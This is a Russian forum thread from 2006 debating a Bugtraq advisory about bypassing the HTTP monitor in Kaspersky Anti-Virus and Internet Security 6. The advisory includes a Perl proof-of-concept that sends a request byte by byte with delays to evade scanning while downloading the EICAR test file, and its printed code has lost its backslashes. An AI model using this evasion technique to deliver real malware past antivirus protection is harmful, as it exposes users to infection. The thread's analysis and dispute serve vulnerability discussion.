Перейти к содержанию
nobody@nowhere

Kaspersky antivirus 6: HTTP monitor bypassing

Recommended Posts

http://www.securityfocus.com/archive/1/434827 :

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Блин, не успели зарелизить, уже уязвимость нашли ...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
Блин, не успели зарелизить, уже уязвимость нашли ...

Интересно посмотреть, насколько быстро запатчат... Надеюсь, что запатчат.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

ну можно вспомнить певицу Мадонну, она то точно популярнее и известнее Линукса..

А можно блендер с мотоциклом сравнивать..и там и там мотор есть.

Добавлено спустя 7 минут 54 секунды:

вдруг кто не сходит ссылке не почитает..

BugTraq

Back to list | Post reply

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

john kak-sam to

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "r" );

sendone( $s, "n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "rn";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:s+(d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "n";

next if $v eq "r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

Добавлено спустя 1 минуту 18 секунд:

Кстати, это ещё не уязвимость и даже не кандидат в уязвимости.. Просто сообщение некого

john kak-sam to

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TiX

Этот некто создал этот топик Ж) Война прожолжается...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

ну и тест, теста (vir2.gif)

пусть все остальные мониторы выключены (vir3.gif)

А вот с ssl не так всё просто :(

vir.gif

vir2.gif

vir3.gif

post-36-1148455993.gif

post-1-1148455993.gif

post-1-1148455994.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

тест чего и на что?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets

Ответ разработчика ЛК читайте здесь: http://forum.kaspersky.com/index.php?showt...st&p=120245.

А вот с ssl не так всё просто

Проверка ссл-трафика веб-антивирусом появится в MP1 (уже добавлена в бетах).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

а. осталось троянописателей убедить запускать IE для качанья, они люди злобные и подстраиваться так что бы KAV им не давал качать не будут. ;) было бы не смешно, а просто печально если бы под IE оно тоже пропускало вирусы.

Добавлено спустя 6 минут 48 секунд:

Блин, не успели зарелизить, уже уязвимость нашли ...

читайте интерью Данилова - "поделия ученика 11 класса", ну и все отсюда вытекающее.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

vir4.gif

post-36-1148459453.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

линк на что?

проходят. но монитор их не видит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

Сергей Ильин

дыра ли это..и вообще.. подождём что напишут на www.securityfocus.com

Господин утверждает, что веб-антивирус в принципе не работает.

линк на что?
интерью Данилова - "поделия ученика 11 класса

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

нет. дырки в IE эксплуатируются в полный рост. в iframe, рендеринг картинок - впомните как специальные bmp роняли всю винду. да и просто вредоносный javascript. браузер ничего из этого на диск записывать не будет, он мило отработает. даже если запись в кэш будет остановлена - поздно уже.

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

каков уровень авторов и их знания технологии таков и результат

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
javascript

с файловой системой напрямую не работает.

Добавлено спустя 8 минут 38 секунд:

есть одно замечаение, www.securityfocus.com принадлежит конкуренту каспера - семантику. Мне кажется, если, указанная выше, уязвимость была очень серьёзной, то семантик бы первый крикнул.. типа ВОТ ВАМ..

хотя с другой стороны, кто его знает.. что там в голове у семантика :))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets

Я запустил зловещий скрипт, долго смотрел на приведённый ниже алерт, задавая себе вопрос "А где прикол?"... И потом до меня вдруг дошло! Ну конечно же! john, я наконец-то всё понял! Ведь это же алерт Анти-Хакера! То есть фаервола! То есть такой штуки, которой в Dr.Web, как бы это сказать, нету... Именно поэтому вы не учли, что такой алерт появится, если вы вместо стандартного браузера или даунлоадера (для защиты которых создан компонент Web-Antivirus в КИС 6) используете ваш самописный скрипт, запущенный на компе клиента. Что ж, не страшно, с кем не бывает...

Вот на всякий случай, может понадобится кому...=) http://exler.ru/expromt/12-01-2005.htm

ah1.JPG

post-198-1148463281.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
дайте линк, может что-то проясниться.

Прояснится только то, что в моём длинном посте про Dr.Web больше правды, чем кажется на первый взгляд =) Держите линк: http://inesp.ru/download/Interview.rar

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

Сергей Ильин

это извращённый реверсивный троян. Как я уже не раз писал, в скрипте нет особой уязвимости и тем более угрозы.

ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

НЕЛЬЗЯ.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Угу, я вам больше скажу. Я подозреваю, что и в КАВ без антихакера эту уязвимость нельзя будет использовать, ибо сработает файловый монитор, когда eicar будет закачан на комп. Давайте так... Чтобы не быть голословным, я вечером это проверю и выложу скриншоты (в том числе и на форуме ЛК, чтобы народ зря не пугался). Просто в универе я это проверить не могу, так как даже если я жму "Разрешить" в антихакере, eicar блокируется внешним фаерволлом универа =(

Ну а пока я проверяю, пусть нам john кинет линк на инет-магазин, где можно купить веб-антивирус производства Dr.Web, который конечно же будет нас защищать от этого зловреда...=)))))) Ведь раз 11-классники уже написали свой Веб-АВ, то у НАСТОЯЩИХ СПЕЦИАЛИСТОВ непременно найдётся гораздо более надёжная защита, правда?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • Ego Dekker
      Антивирусы были обновлены до версии 13.1.16. В числе прочего добавлены совместимость с Windows 10 20H1 и поддержка Windows 10 20H2.
    • Ego Dekker
      Программа для удаления продуктов ESET обновилась до версии 9.0.1.0. Для просмотра всех команд запустите утилиту с параметром /help. 
    • santy
      1. на самом деле можно и не удалять, а редактировать единственный критерий для создания запросов. Было бы только удобно формировать такой запрос.... например, "все объекты с цифровой, которая не входит в белый список". здесь ты одним значением не найдешь их фильтруя все объекты сквозным образом по ИНФО, как минимум необходимо два условия, а значит и два значения вводить для запроса. 2. подсветки нет, но это наверное не самое главное. для скорости анализа важно, (хотя бы строку из инфо, которая соответствует критерию).... когда ИНФО содержит много информации. для формирования скрипта- не критично. 3. старых и новых критериев нет. все действующие. ненужные удалить. хотя может и полезно было бы ставить check "отключить" или "включить" данное правило в базе.
        вся эта работа выполняется на стадии формирования списка объектов автозапуска. все исполняемые файлы, которые встречаются по ссылкам в реестре, в cmdLine, и проч. Если ты набрал в поиске по наименованию "cmd.exe", ты уже нашел данный объект в списке со всей его историей (ИНФО), собранной на стадии формирования образа автозапуска.... в какие параметры, ссылки входит в реестре или в cmdLine. цитата "выше Разве?" взята из предложения по деструктивным действиям чистых файлов, когда эти деструктивные действия находятся с помощью критериев, но чистый хэш снимает статус, подтверждающий дейструктивность действия данного файла в анализируемой системе.
    • PR55.RP55
      Недостатки uVS:
      1) Невозможно задать временный критерий. После поиска созданный критерий нужно удалять... Решение: При создании критерия добавить чек бокс:  НЕ вносить изменений в snms [ V ] 2) В Инфо. нет подсветки по типу поиска в браузере ( подсветить всё найденное ) 3) Поиск идёт по всем критериям -  по старым и по новым. Когда критериев много ( а их много ) такой поиск теряет смысл. Разве ? Нет смысла искать в других полях по: каталог; имя производителя; цифровой подписи; хэш. Напомню:  " Пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.  "      
    • santy
      1. уточни, о каком функционале по ИНФО идет речь. одно дело фильтрующий поиск, т.е. список объектов фильтруется (сейчас) по определенному полю, и поиск выполняется сразу после введения одного символа, далее, уже по двум добавленным символам. и т.д. запрос же выполняется после введения некоторого значения. (не единственного символа.) запросов в таком виде сейчас нет, они могли бы быть, если будет реализована функция фильтрации по единственному критерию. (т.е. в этом случае мы получаем результат не по всем критериям, а по одному из списка) ----- здесь не факт, что фильтрующий поиск будет работать настолько быстро при проверке введенного символа по всем полям. 2. приведи примеры, когда введенное значение имеет смысл фильтровать по всем полям ИНФО. скажем если мы ищем имя файла, то нет смысла его искать в качестве вхождения в другие поля, аналогично и имя каталога, и имя производителя, и цифровой подписи, хэшей. и т.д. т.о. может получиться, что мы только увеличим время обновления зафильтрованного списка, и не получив ожидаемого лучшего результата.
×